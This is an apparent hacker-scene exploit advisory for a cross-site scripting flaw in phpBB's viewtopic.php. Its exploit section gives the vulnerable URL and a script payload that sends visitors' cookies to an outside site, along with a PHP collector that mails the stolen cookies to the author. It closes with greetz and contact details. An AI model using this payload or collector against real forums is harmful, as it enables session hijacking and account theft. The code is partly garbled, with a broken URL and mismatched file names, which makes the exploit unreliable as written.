XSS Exploit In phpBB viewtopic.php



A: BACKGROUND [from phpbb.com]

phpBB is a high powered, fully scalable, and highly customisable open-

source bulletin board package. phpBB has a user-friendly interface, simple 

and straightforward administration panel, and helpful FAQ. Based on the 

powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL 

or Access/ODBC database servers, phpBB is the ideal free community 

solution for all web sites.



B: DESCRIPTION

The cross site scripting allow you to print a html or javascript or others 

in the webpage

when it just open not write in the page.



C: EXPLOIT

This is the URLs of the exploit:

http://[site]/phpBB/viewtopic.php?topic_id=[script]



And you can steal cookie by changing [script] to

<script>document.location='http://any-web-

site/cookies.php?'+document.cookie</script>

and in http://any-web-site/cookie.php put

----------------cookie.php-------------------

<?

mail("silentneedle@hotmail.com","cookies from phpbb",$http_cookie);

echo $http_cookie; //or you can send with the variable name

?>

-----------------------------------------------



D: GREETZ

To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , 7azm , King Of Ray , OH SHE 

IS A LITTLE RUN AWAY[puretone & kelly osbourne] :)

and thanks to the last exploit in phpbb :)



E: CONTACT

Silent Needle

silentneedle@hotmail.com



F: OH LONG NIGHT

Bye